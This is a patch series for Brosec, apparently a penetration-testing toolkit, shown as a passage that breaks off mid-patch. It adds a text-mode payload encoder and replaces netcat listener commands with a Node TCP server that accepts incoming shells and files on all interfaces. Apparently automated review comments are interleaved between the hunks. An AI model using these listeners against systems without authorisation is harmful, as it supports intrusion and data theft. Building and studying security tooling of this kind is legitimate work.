From dbeea20cf3dd4c813270e131df8a725dec1a0f00 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 15 Jul 2016 09:53:48 -0400 Subject: [PATCH 01/18] Init of encoder feature --- bros | 10 +++- modules/encoder.js | 132 +++++++++++++++++++++++++++++++++++++++++++ modules/utilities.js | 5 ++ 3 files changed, 146 insertions(+), 1 deletion(-) create mode 100644 modules/encoder.js diff --git a/bros b/bros index 644de67..584ee77 100755 --- a/bros +++ b/bros @@ -42,7 +42,7 @@ function getFirstArgValue(arg) { } function parseArgs() { - + var oldSecondary; if (firstArgument >= 1 && firstArgument <= 6) { secondaryMenu = getFirstArgValue(firstArgument); @@ -75,6 +75,7 @@ function parseArgs() { } else if (typeof(firstArgument) === "string") { firstArgument = firstArgument.toUpperCase(); try { + oldSecondary = secondArgument; secondArgument = secondArgument.toUpperCase(); } catch(err){ @@ -92,6 +93,13 @@ function parseArgs() { //simpleFtp.ftps(argv); } else if (firstArgument === "UPDATE"){ utilities.update(); + } else if (firstArgument === "ENCODE"){ + if (secondArgument){ + utilities.encoder(oldSecondary); + } else { + utilities.encoder(); + } + } else if (firstArgument+" "+secondArgument === "SET LHOST" && !thirdArgument){ interfaces.setlhost(); diff --git a/modules/encoder.js b/modules/encoder.js new file mode 100644 index 0000000..8139ec0 --- /dev/null +++ b/modules/encoder.js 
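Review bot: The new ENCODE branch in parseArgs forwards a single word, `oldSecondary`, so `bros encode` with a multi-word payload silently encodes only the first word unless the user quotes it on the shell; if the remaining argv words are reachable at this point, join them with a space before calling `utilities.encoder`. Passing the pre-uppercase copy is the right call since encoder input is case-sensitive, but the `if (secondArgument) { ... } else { utilities.encoder(); }` split looks redundant: `oldSecondary` is assigned from `secondArgument` before `toUpperCase()` runs, so it is already `undefined` when no second argument was given and the single call `utilities.encoder(oldSecondary);` covers both cases. parseArgs continues outside the hunk.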
@@ -0,0 +1,132 @@ +var blessed = require("blessed"), + output = require('./output'), + outputValue = ''; +var screen = blessed.screen({ + smartCSR: true +}); +screen.title = 'Brosec Encoder'; +exports.init = function(input){ + + // box at bottom for chat input + inputBox = blessed.textbox({ + parent: screen, + height: '15%', + label: '[ Input ]', + + border: { + type: 'line', fg: "#27ea09" + }, + width: '80%', + top: 'center', + left: 'center', + }); + + var box = blessed.box({ + parent: screen, + top: '20%', + width: '80%', + left: 'center', + autoPadding: true, + label: '[ Output ]', + height: '15%', + content: "", + tags: true, + border: { + type: 'line', fg: "#27ea09" + } + }); + + screen.append(box); + + setTimeout(function(){ + inputBox.focus(); + screen.render(); + if(input){ + inputBox.setContent(input); + } + setInterval(function(){ + outputValue = encodeURIComponent(inputBox.getContent()); + box.setContent(outputValue); + screen.title = 'hello' + screen.render(); + }, 5) + }, 100) + + screen.render(); + + inputBox.focus(); + + + var inputBoxFocusHandler = function() { + + inputBox.readInput(function(data) { + + }); + inputBox.key('C-c', function(){ + return process.exit(0); + }) + inputBox.key('enter', function(ch, key) { + + + + + + + var command = inputBox.getValue(); + + box.hide(); + inputBox.hide(); + screen.destroy(); + //outputBox.addItem(command); + output.cmd(outputValue); + + setTimeout(function(){ + return process.exit(0); + }, 50) + //return process.exit(0); + + inputBox.unkey('enter'); + screen.render(); + + inputBoxFocusHandler(); + }); + + inputBox.key('tab', function(ch, key) { + inputBox.unkey('enter'); + }); + }; + inputBox.on('focus', inputBoxFocusHandler); + + + + + + + + + setTimeout(function(){ + //inputBox.focus(); + //shells.getSessionsForBox(); + screen.render(); + + }, 50) + + + screen.key('tab', function(ch, key) { + if (inputBox.focused) { + box.focus(); + } else { + inputBox.focus(); + } + + screen.render(); + }); + + + 
screen.key(['escape', 'q', 'C-c'], function(ch, key) { + return process.exit(0); + }); + +} + + diff --git a/modules/utilities.js b/modules/utilities.js index 6d4f81f..b951072 100644 --- a/modules/utilities.js +++ b/modules/utilities.js @@ -1,5 +1,6 @@ var child_process = require('child_process'), log = require('./log.js'), + encoder = require('./encoder'), brosDir = require.resolve('cli-color'); // Get install path @@ -24,3 +25,7 @@ exports.update = function(){ }) } + +exports.encoder = function(input){ + encoder.init(input); +} \ No newline at end of file From 06222a671759d55e3bbe348c6f64c16eb6420a80 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Sat, 23 Jul 2016 15:03:20 -0400 Subject: [PATCH 02/18] Removed kexec dependency, updated documentation --- CHANGELOG.md | 8 ++++++++ README.md | 4 +++- modules/checkModule.js | 8 -------- modules/encoder.js | 18 +++++++++-------- modules/nc.js | 45 +++++++++++++++++++++++++++++++++++++++++ modules/questionUser.js | 41 +++++++++---------------------------- package.json | 9 +++------ 7 files changed, 79 insertions(+), 54 deletions(-) delete mode 100644 modules/checkModule.js create mode 100644 modules/nc.js diff --git a/CHANGELOG.md b/CHANGELOG.md index 7fca998..a5f5ab8 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,13 @@ # ChangeLog +## 1.1.0a _(July 23, 2016)_ + +- Dependencies + - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) + + +- Bug fixes + ## 0.2b _(Feb 16, 2016)_ - Features diff --git a/README.md b/README.md index ea58de7..51f1197 100644 --- a/README.md +++ b/README.md 
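Review bot: `inputBox = blessed.textbox({ ... })` near the top of `init` has no `var`, so the widget becomes an implicit global that outlives the call; declare it locally, `var inputBox = blessed.textbox({`. The 5 ms `setInterval` re-encodes and re-renders the whole screen on every tick whether or not anything changed, is never cleared, and its `screen.title = 'hello'` overwrites the `'Brosec Encoder'` title set at module load each time it runs. `inputBoxFocusHandler` is attached with `inputBox.on('focus', ...)` and registers fresh `C-c`/`enter`/`tab` handlers inside, so every focus change (the `tab` key toggles focus) stacks another copy of each handler; bind them once outside the focus callback. `var command = inputBox.getValue()` in the enter handler is never read and can go.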
@@ -73,8 +73,10 @@ Installation #### Kali Linux - `apt-get install npm build-essential g++ xsel netcat` Install dependencies -- `npm config set registry http://registry.npmjs.org/` Npm registry seems to be broken by default when installed from Kali repos - `npm install -g n` Install n (nodejs version manager) + - If the above fails, try - `npm config set registry http://registry.npmjs.org/` + + - `n latest` Install latest version of nodejs - `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - `cd Brosec && npm install` - cd into the directory and install npm depdendencies diff --git a/modules/checkModule.js b/modules/checkModule.js deleted file mode 100644 index 7ddf620..0000000 --- a/modules/checkModule.js +++ /dev/null @@ -1,8 +0,0 @@ -exports.kexec = function(){ - try { - var kexec = require('kexec'); - return true - } catch (err){ - return false; - } -} diff --git a/modules/encoder.js b/modules/encoder.js index 8139ec0..5d66422 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -1,12 +1,13 @@ var blessed = require("blessed"), output = require('./output'), outputValue = ''; -var screen = blessed.screen({ - smartCSR: true -}); -screen.title = 'Brosec Encoder'; -exports.init = function(input){ + +exports.init = function(input){ + var screen = blessed.screen({ + smartCSR: true + }); + process.title = 'Brosec Encoder'; // box at bottom for chat input inputBox = blessed.textbox({ parent: screen, @@ -17,6 +18,7 @@ exports.init = function(input){ type: 'line', fg: "#27ea09" }, width: '80%', + content: '', top: 'center', left: 'center', }); @@ -29,7 +31,7 @@ exports.init = function(input){ autoPadding: true, label: '[ Output ]', height: '15%', - content: "", + content: '', tags: true, border: { type: 'line', fg: "#27ea09" 
@@ -59,8 +61,8 @@ exports.init = function(input){ var inputBoxFocusHandler = function() { - inputBox.readInput(function(data) { - + inputBox.readInput("foo", "bar", function(data) { + console.log(data); }); inputBox.key('C-c', function(){ return process.exit(0); diff --git a/modules/nc.js b/modules/nc.js new file mode 100644 index 0000000..9ce0e64 --- /dev/null +++ b/modules/nc.js @@ -0,0 +1,45 @@ +var net = require('net'), + fs = require('fs'); + +exports.listen = function(port){ + var server = net.createServer({maxConnections: 1},function (socket) { + process.stdin.resume(); + process.stdin.setEncoding('utf8'); + + process.stdin.on('data', function(chunk) { + socket.write(chunk); + }); + + socket.on('data', function (data) { + process.stdout.write(data); + }); + + socket.on('end', function () { + process.exit(1); + }); + }).listen(port, '0.0.0.0'); + server.maxConnections = 1; +} + +exports.receiveFile = function(port, path, file){ + + var server = net.createServer({maxConnections: 1},function (socket) { + + var wstream = fs.createWriteStream(path+file); + socket.on('data', function (data) { + wstream.write(data); + }); + + socket.on('end', function () { + wstream.end(); + }); + + wstream.on('finish', function () { + + console.log('[+] File successfully saved to '+path+file); + process.exit(1); + }); +}).listen(port, '0.0.0.0'); + +server.maxConnections = 1; +} diff --git a/modules/questionUser.js b/modules/questionUser.js index 6b5c145..182d3d6 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -5,13 +5,9 @@ var prompt = require('prompt'), settings = require('../settings.js'), db = require('../db/db'), currentOS = os.type(), - checkModule = require('./checkModule.js'), + netcat = require('./nc'), finalAnswer -if (checkModule.kexec()) { - var kexec = require('kexec'); -} - exports.http = function(callback) { prompt.message = "Should I fire up a web server for you? (Y/n) :" 
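Review bot: `inputBox.readInput("foo", "bar", function(data) { console.log(data); })` carries placeholder arguments and a debug print; as far as I recall blessed's `readInput` takes only a callback, and `console.log` writes straight to stdout underneath the full-screen blessed UI and garbles it. Restore `inputBox.readInput(function(data) { ... });` and drop the log (or route it through the output box) before this ships. `init` continues outside the hunk.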
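Review bot: Neither server in `listen` nor `receiveFile` registers an `'error'` handler, so a port that is already in use, or a privileged port without rights, surfaces as an uncaught EADDRINUSE/EACCES exception instead of a message; add `server.on('error', function(err) { console.log('[!] Listener failed: ' + err.message); process.exit(1); });` after each `createServer`. Both servers bind to `'0.0.0.0'`, which exposes the listener on every interface; since the tool already tracks an LHOST (see `interfaces.setlhost` in the bros patch), binding to that address, or taking it as a parameter, keeps exposure to the interface the user chose. The normal completion paths call `process.exit(1)`, which tells the shell the operation failed — use `process.exit(0)` there — and `receiveFile` opens `path+file` with default flags, silently overwriting an existing file, whereas `fs.createWriteStream(path + file, { flags: 'wx' })` would refuse. `maxConnections` is set both as a `createServer` option and as a property; to my knowledge only the property form is honoured by Node, so the option can go.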
@@ -36,8 +32,8 @@ exports.http = function(callback) { exports.ncat = function(callback) { var port = db.getConfig("LPORT") - if (kexec){ - prompt.message = "Should I start a netcat listener for you? (Y/n) :" + + prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', description: ":" @@ -46,9 +42,9 @@ exports.ncat = function(callback) { try { result._ = result._.toUpperCase() if (result._ === "Y" || !result._) { - console.log(log.blackBright("\n[*] Initializing hacking sequence (" + settings.netcat + " -lnp " + port + " -vv)")); callback(finalAnswer); - kexec(settings.netcat + " -lnp " + port + " -vv"); + console.log(log.blackBright("\n[*] TCP socket server listening on port " + port)); + netcat.listen(port); } else { callback(finalAnswer); } @@ -57,20 +53,15 @@ exports.ncat = function(callback) { } }) - } else { - console.log(""); - console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " -vv")); - callback(finalAnswer); - } + } exports.ncatReceiveFile = function(callback) { var port = db.getConfig("LPORT"); - var path = db.getConfig("PATH"); + var path = process.cwd()+"/"; var localFile = finalAnswer.replace(/(\/)/g, "_") - if (!kexec){ - prompt.message = "Should I start a netcat listener for you? (Y/n) :" + prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', description: ":" 
@@ -80,17 +71,10 @@ exports.ncatReceiveFile = function(callback) { result._ = result._.toUpperCase() if (result._ === "Y" || !result._) { - - if (!path || path.length <= 0) { - log.yellow("Warning: Path variable is not set, defaulting to /var/tmp/") - } - path = "/var/tmp/" - - // if kexec isn't installed, notify the user callback(finalAnswer); + console.log(log.blackBright("\n[*] TCP socket server listening on port " + port + " (File will be saved as "+path+localFile+")\n")); - console.log(log.blackBright("\n[*] Initializing hacking sequence (File will be saved as " + path + "/bros" + localFile + ")\n")) - kexec(settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile + " -vv"); + netcat.receiveFile(port, path, localFile); } else { callback(finalAnswer); @@ -100,11 +84,6 @@ exports.ncatReceiveFile = function(callback) { } }) - } else { - callback(finalAnswer); - console.log(""); - console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile)); - } } exports.some = function(question, callback, type) { diff --git a/package.json b/package.json index fae406f..29f0185 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "Brosec", - "version": "0.0.1a", + "version": "1.1.0", "description": "Brosec - Pentest fu for bros", "main": "bros.js", "repository": { @@ -16,7 +16,6 @@ "dirty": "*", "ejs": "^2.3.1", "express": "*", - "kexec": "^2.0.2", "morgan": "*", "mstring": "*", "prompt": "*", @@ -25,10 +24,8 @@ "method-override": "*", "ecstatic": "*", "simple-git": "*", - "ftpd": "*" - }, - "optionalDependencies":{ - "kexec":"^2.0.2" + "ftpd": "*", + "blessed": "*" }, "author": "Gabe Marshall", "license": "ISC" From 83d59aa0c3472514400f45f76c8d6f2f89b855b6 Mon Sep 17 00:00:00 2001 
From: gabemarshall Date: Sat, 23 Jul 2016 15:03:57 -0400 Subject: [PATCH 03/18] Updates to README to reflect no longer needing kexec or netcat --- README.md | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 51f1197..6136595 100644 --- a/README.md +++ b/README.md @@ -66,13 +66,13 @@ Installation #### Mac -- `brew install node netcat` - Install Nodejs and netcat (nc or ncat will work too) +- `brew install node` - Install Nodejs - `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - `cd Brosec && npm install` - cd into the directory and install npm depdendencies #### Kali Linux -- `apt-get install npm build-essential g++ xsel netcat` Install dependencies +- `apt-get install npm build-essential g++ xsel` Install dependencies - `npm install -g n` Install n (nodejs version manager) - If the above fails, try - `npm config set registry http://registry.npmjs.org/` @@ -84,11 +84,8 @@ Installation ### Windows (Unsupported) - Install [nodejs](https://nodejs.org/download) -- Install [ncat](https://nmap.org/download.html) - `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -Payloads that utilize netcat will not work due to the kexec library not being supported in Windows - #### Optional Add bros directory path to your PATH env variable, create a symlink for the bros file, etc 
@@ -96,7 +93,7 @@ Add bros directory path to your PATH env variable, create a symlink for the bros Configuration ===================== -Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc). +Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Swag From 472034fc4acc12f6d427e13028513294cc78e8f8 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 10:47:52 -0400 Subject: [PATCH 04/18] Initial working version of bros encode --- modules/encoder.js | 345 ++++++++++++++++++++++++++++----------------- package.json | 3 +- 2 files changed, 218 insertions(+), 130 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 5d66422..8e4589c 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
@@ -1,134 +1,221 @@ var blessed = require("blessed"), - output = require('./output'), - outputValue = ''; - - -exports.init = function(input){ - var screen = blessed.screen({ - smartCSR: true - }); - process.title = 'Brosec Encoder'; - // box at bottom for chat input - inputBox = blessed.textbox({ - parent: screen, - height: '15%', - label: '[ Input ]', - - border: { - type: 'line', fg: "#27ea09" - }, - width: '80%', - content: '', - top: 'center', - left: 'center', - }); - - var box = blessed.box({ - parent: screen, - top: '20%', - width: '80%', - left: 'center', - autoPadding: true, - label: '[ Output ]', - height: '15%', - content: '', - tags: true, - border: { - type: 'line', fg: "#27ea09" - } - }); - - screen.append(box); - - setTimeout(function(){ - inputBox.focus(); - screen.render(); - if(input){ - inputBox.setContent(input); - } - setInterval(function(){ - outputValue = encodeURIComponent(inputBox.getContent()); - box.setContent(outputValue); - screen.title = 'hello' - screen.render(); - }, 5) - }, 100) - - screen.render(); - - inputBox.focus(); - - - var inputBoxFocusHandler = function() { - - inputBox.readInput("foo", "bar", function(data) { - console.log(data); - }); - inputBox.key('C-c', function(){ - return process.exit(0); - }) - inputBox.key('enter', function(ch, key) { - - - - - - - var command = inputBox.getValue(); - - box.hide(); - inputBox.hide(); - screen.destroy(); - //outputBox.addItem(command); - output.cmd(outputValue); - - setTimeout(function(){ - return process.exit(0); - }, 50) - //return process.exit(0); - - inputBox.unkey('enter'); - screen.render(); - - inputBoxFocusHandler(); - }); - - inputBox.key('tab', function(ch, key) { - inputBox.unkey('enter'); - }); - }; - inputBox.on('focus', inputBoxFocusHandler); - - - - - - - - - setTimeout(function(){ - //inputBox.focus(); - //shells.getSessionsForBox(); - screen.render(); - - }, 50) - - - screen.key('tab', function(ch, key) { - if (inputBox.focused) { - box.focus(); - } else { - 
inputBox.focus(); - } - - screen.render(); - }); - + output = require('./output'), + htmlEncode = require('js-htmlencode').htmlEncode, + htmlDecode = require('js-htmlencode').htmlDecode, + outputValue = '', + counter = 0; + +var method = 'ENC', + methodTitle = 'Encoding'; + +var modes = [{ + 'DEC': function(data) { + try {return decodeURIComponent(data)}catch(err){ + return data; + } + }, + 'ENC': function(data) { + return encodeURIComponent(data) + }, + 'title': 'URL' +}, { + 'DEC': function(data) { + try {return htmlDecode(data)}catch(err){return data;} + }, + 'ENC': function(data) { + try {return htmlEncode(data)}catch(err){return data;} + }, + 'title': 'HTML' +}, { + 'DEC': function(data) { + try{return new Buffer(data, 'base64').toString('ascii')}catch(err){return data;} + }, + 'ENC': function(data) { + try{return new Buffer(data).toString('base64');}catch(err){return data;} + }, + 'title': 'Base64' +}] + +function setTitle(title, mode) { + //console.log(mode); + var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + e") + "\n(A)pply to input: " + log.blackBright("Ctrl + a") + " \n(T)oggle Mode: " + log.blackBright("Ctrl + t") + "\n\nPress " + log.blackBright("return") + " to exit."; + var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; + return broTitle; +} +var modeTitle = setTitle(modes[counter]['title'], methodTitle); +var encode = modes[0][method]; + +function toggleMode() { + if (method === 'ENC') { + method = 'DEC'; + encode = modes[counter][method]; + methodTitle = 'Decoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } else { + method = 'ENC'; + encode = modes[counter][method]; + methodTitle = 'Encoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } +} - screen.key(['escape', 'q', 'C-c'], function(ch, key) { - return process.exit(0); - }); +function toggleEncoding() { + if (counter < (modes.length - 1)) { + counter += 1; 
+ } else { + counter = 0; + } + encode = modes[counter]['ENC']; + modeTitle = setTitle(modes[counter]['title'], methodTitle); } - +exports.init = function(input) { + var screen = blessed.screen({ + smartCSR: true + }); + + var inputBox = blessed.textbox({ + parent: screen, + height: '15%', + label: '[ Input ]', + inputOnFocus: true, + border: { + type: 'line', + fg: "#27ea09" + }, + width: '80%', + content: '', + top: '65%', + left: 'center', + }); + + var list = blessed.box({ + parent: inputBox, + height: '45%', + align: 'center', + width: '80%', + style: { + fg: 'green' + }, + top: '12%', + // border: { + // type: 'bg', + // ch: '_', + // fg: "#27ea09" + // }, + left: 'center', + }) + screen.append(list); + var box = blessed.box({ + parent: screen, + top: '45%', + width: '80%', + left: 'center', + autoPadding: true, + label: '[ Output ]', + height: '15%', + content: '', + tags: true, + border: { + type: 'line', + fg: "#27ea09" + } + }); + + screen.append(box); + + setTimeout(function() { + inputBox.focus(); + screen.render(); + if (input) { + inputBox.setValue(input); + } + setInterval(function() { + outputValue = encode(inputBox.getContent()); + box.setContent(outputValue); + list.setContent(modeTitle); + screen.render(); + }, 5) + }, 100) + + screen.render(); + + inputBox.focus(); + + function eHandler() { + this.init = inputBox.onceKey('C-e', function(ch, key) { + inputBox.unkey('C-e'); + + setTimeout(function() { + toggleEncoding(); + eHandler(); + }, 100) + }) + } + + function tHandler() { + this.init = inputBox.onceKey('C-t', function(ch, key) { + inputBox.unkey('C-t'); + setTimeout(function() { + toggleMode(); + tHandler(); + }, 100) + }) + } + var inputBoxFocusHandler = function() { + + inputBox.key('C-c', function() { + return process.exit(0); + }) + + eHandler(); + + tHandler(); + + inputBox.key('C-a', function(ch, key) { + inputBox.setValue(outputValue); + }) + + inputBox.key('enter', function(ch, key) { + + var command = inputBox.getValue(); + + 
box.hide(); + inputBox.hide(); + screen.destroy(); + + setTimeout(function() { + output.cmd(outputValue); + return process.exit(0); + }, 50) + + inputBox.unkey('enter'); + screen.render(); + + inputBoxFocusHandler(); + }); + + }; + inputBox.on('focus', inputBoxFocusHandler); + + setTimeout(function() { + screen.render(); + }, 50) + + + screen.key('tab', function(ch, key) { + if (inputBox.focused) { + list.focus(); + } else { + inputBox.focus(); + } + + screen.render(); + }); + + + screen.key(['escape', 'q', 'C-c'], function(ch, key) { + return process.exit(0); + }); +} diff --git a/package.json b/package.json index 29f0185..5a42b61 100644 --- a/package.json +++ b/package.json @@ -25,7 +25,8 @@ "ecstatic": "*", "simple-git": "*", "ftpd": "*", - "blessed": "*" + "blessed": "*", + "js-htmlencode": "*" }, "author": "Gabe Marshall", "license": "ISC" From 0eb53d609232388e7aaf39e379324dd9b18a2f97 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 13:43:41 -0400 Subject: [PATCH 05/18] Updates to encoder --- modules/encoder.js | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 8e4589c..45cd985 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
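Review bot: `setTitle` calls `log.blackBright`, but this file never requires `log` (the header only pulls in `blessed`, `./output` and `js-htmlencode`), and `var modeTitle = setTitle(...)` runs at module load, so `require('./encoder')` should throw a ReferenceError unless `log` is a global defined elsewhere; add `log = require('cli-color'),` to the require block, as `output.js` does. `new Buffer(data)` / `new Buffer(data, 'base64')` is the deprecated constructor; on the Node versions the README installs (`n latest` in 2016) `Buffer.from(...)` is available and avoids the uninitialised-memory footgun of the old constructor. `this.init = inputBox.onceKey(...)` inside the plain functions `eHandler`/`tHandler` assigns to the global object in sloppy mode and the value is never read, so `inputBox.onceKey(...)` alone is enough. `inputBoxFocusHandler` still registers `C-c`, `C-a` and `enter` handlers on every focus event, so they accumulate each time `tab` cycles focus.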
@@ -34,11 +34,24 @@ var modes = [{ try{return new Buffer(data).toString('base64');}catch(err){return data;} }, 'title': 'Base64' +}, +{ + 'DEC': function(data) { + try{return new Buffer(data, 'hex').toString('ascii')}catch(err){return data;} + }, + 'ENC': function(data) { + try{return new Buffer(data).toString('hex');}catch(err){return data;} + }, + 'title': 'Hex' }] function setTitle(title, mode) { //console.log(mode); - var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + e") + "\n(A)pply to input: " + log.blackBright("Ctrl + a") + " \n(T)oggle Mode: " + log.blackBright("Ctrl + t") + "\n\nPress " + log.blackBright("return") + " to exit."; + var e = log.cyanBright("e"); + var a = log.cyanBright("a"); + var t = log.cyanBright("t"); + var ret = log.cyanBright("return"); + var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + "+e+"") + "\n(A)pply to input: " + log.blackBright("Ctrl + "+a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + "+t) + "\n\nPress " + ret + " to exit."; var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; return broTitle; } @@ -71,6 +84,7 @@ function toggleEncoding() { } exports.init = function(input) { + var screen = blessed.screen({ smartCSR: true }); @@ -203,7 +217,6 @@ exports.init = function(input) { screen.render(); }, 50) - screen.key('tab', function(ch, key) { if (inputBox.focused) { list.focus(); From 42edc3cca5ad0bf4520a559e6809b6e6d475eb1a Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 15:51:57 -0400 Subject: [PATCH 06/18] Bug fixes --- modules/encoder.js | 26 ++++++++++++++++++++------ 1 file changed, 20 insertions(+), 6 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 45cd985..bcffe75 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
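Review bot: In the new Hex mode, `new Buffer(data, 'hex')` does not throw on odd-length or non-hex input — it stops at the first bad pair — so the `try/catch` fallback never triggers and the Output box silently shows a truncated decode; validate first, e.g. `if (!/^([0-9a-fA-F]{2})*$/.test(data)) return data;`. `.toString('ascii')` also strips the high bit of every decoded byte, so any non-ASCII payload does not round-trip through encode/decode; the default utf8 `.toString()` (as the Base64 decoder is later changed to use) is the safer choice. The same `new Buffer(...)` constructor concern applies here as in the Base64 codec above it.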
@@ -3,7 +3,9 @@ var blessed = require("blessed"), htmlEncode = require('js-htmlencode').htmlEncode, htmlDecode = require('js-htmlencode').htmlDecode, outputValue = '', - counter = 0; + justatest = '', + counter = 0, + keychanged = false; var method = 'ENC', methodTitle = 'Encoding'; @@ -146,12 +148,17 @@ exports.init = function(input) { inputBox.setValue(input); } setInterval(function() { - outputValue = encode(inputBox.getContent()); - box.setContent(outputValue); - list.setContent(modeTitle); - screen.render(); + if(keychanged){ + outputValue = encode(inputBox.getContent()); + justatest = outputValue; + box.setContent(outputValue); + list.setContent(modeTitle); + screen.render(); + } }, 5) - }, 100) + list.setContent(modeTitle); + screen.render(); + }, 50) screen.render(); @@ -182,6 +189,13 @@ exports.init = function(input) { inputBox.key('C-c', function() { return process.exit(0); }) + inputBox.on('keypress', function(){ + outputValue = encode(inputBox.getContent()); + keychanged = true; + setTimeout(function(){ + keychanged = false; + }, 75) + }) eHandler(); From ab720b7dca9de56935ad360219450917a91fdc8d Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 20:36:15 -0400 Subject: [PATCH 07/18] Fixed bug that was causing long payloads to break --- modules/encoder.js | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index bcffe75..bcb1709 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -17,7 +17,11 @@ var modes = [{ } }, 'ENC': function(data) { - return encodeURIComponent(data) + if (keychanged){ + keychanged = false; + var a = encodeURIComponent(data); + return encodeURIComponent(data); + } }, 'title': 'URL' }, { @@ -128,6 +132,7 @@ exports.init = function(input) { top: '45%', width: '80%', left: 'center', + scrollable: true, autoPadding: true, label: '[ Output ]', height: '15%', 
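Review bot: `justatest` is added to the module header and later assigned from `outputValue` in the interval (the `@@ -146` hunk) but never read; drop both. `keychanged` is a module-wide flag shared between the interval and the keypress handler, and the keypress handler clears it on a 75 ms timer, so keystrokes arriving faster than that leave the Output box stale until the next key; it is simpler to set the flag on keypress and clear it where the interval consumes it, `if (keychanged) { keychanged = false; outputValue = encode(inputBox.getContent()); ... }`, with no timer at all. The keypress handler also encodes `inputBox.getContent()` itself, duplicating the work the interval does 5 ms later.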
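Review bot: The URL `ENC` function now returns `undefined` whenever `keychanged` is false, and it is the only one of the four codecs with that guard, so switching to URL mode leaves the Output box empty (or showing the string `undefined`) until the next keystroke while HTML/Base64/Hex keep their last value. `var a = encodeURIComponent(data)` is computed and discarded, doubling the work on exactly the long inputs this commit is about. Keep the codecs pure — `return encodeURIComponent(data);` — and leave the `keychanged` bookkeeping to the interval and keypress handler that own the flag.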
@@ -190,11 +195,10 @@ exports.init = function(input) { return process.exit(0); }) inputBox.on('keypress', function(){ - outputValue = encode(inputBox.getContent()); - keychanged = true; - setTimeout(function(){ - keychanged = false; - }, 75) + if (!keychanged){ + outputValue = encode(inputBox.getContent()); + keychanged = true; + } }) eHandler(); @@ -208,7 +212,8 @@ exports.init = function(input) { inputBox.key('enter', function(ch, key) { var command = inputBox.getValue(); - + keychanged = true; + outputValue = encode(inputBox.getValue()); box.hide(); inputBox.hide(); screen.destroy(); From f37bf8ee01bd49601a9cd0c47a7a8d63cd898485 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Tue, 26 Jul 2016 16:22:29 -0400 Subject: [PATCH 08/18] Performance improvements to encoder module --- modules/encoder.js | 167 ++++++++++++++++++++++++---------------- modules/output.js | 41 +++------- modules/questionUser.js | 11 ++- package.json | 3 +- 4 files changed, 123 insertions(+), 99 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index bcb1709..883328e 100644 --- a/modules/encoder.js +++ b/modules/encoder.js 
@@ -12,41 +12,74 @@ var method = 'ENC', var modes = [{ 'DEC': function(data) { - try {return decodeURIComponent(data)}catch(err){ - return data; - } + try { + keychanged = false; + return decodeURIComponent(data) + } catch (err) { + return data; + } }, 'ENC': function(data) { - if (keychanged){ - keychanged = false; - var a = encodeURIComponent(data); - return encodeURIComponent(data); - } + keychanged = false; + return encodeURIComponent(data); }, 'title': 'URL' }, { 'DEC': function(data) { - try {return htmlDecode(data)}catch(err){return data;} + try { + return htmlDecode(data) + } catch (err) { + return data; + } }, 'ENC': function(data) { - try {return htmlEncode(data)}catch(err){return data;} + try { + keychanged = false; + return htmlEncode(data); + + } catch (err) { + console.log(err); + return data; + } }, 'title': 'HTML' }, { 'DEC': function(data) { - try{return new Buffer(data, 'base64').toString('ascii')}catch(err){return data;} + try { + + keychanged = false; + return new Buffer(data, 'base64').toString(); + } catch (err) { + + return data; + } }, 'ENC': function(data) { - try{return new Buffer(data).toString('base64');}catch(err){return data;} + try { + + keychanged = false; + return new Buffer(data).toString('base64'); + } catch (err) { + return data; + } }, 'title': 'Base64' -}, -{ +}, { 'DEC': function(data) { - try{return new Buffer(data, 'hex').toString('ascii')}catch(err){return data;} + try { + keychanged = false; + return new Buffer(data, 'hex').toString('ascii') + } catch (err) { + return data; + } }, 'ENC': function(data) { - try{return new Buffer(data).toString('hex');}catch(err){return data;} + try { + keychanged = 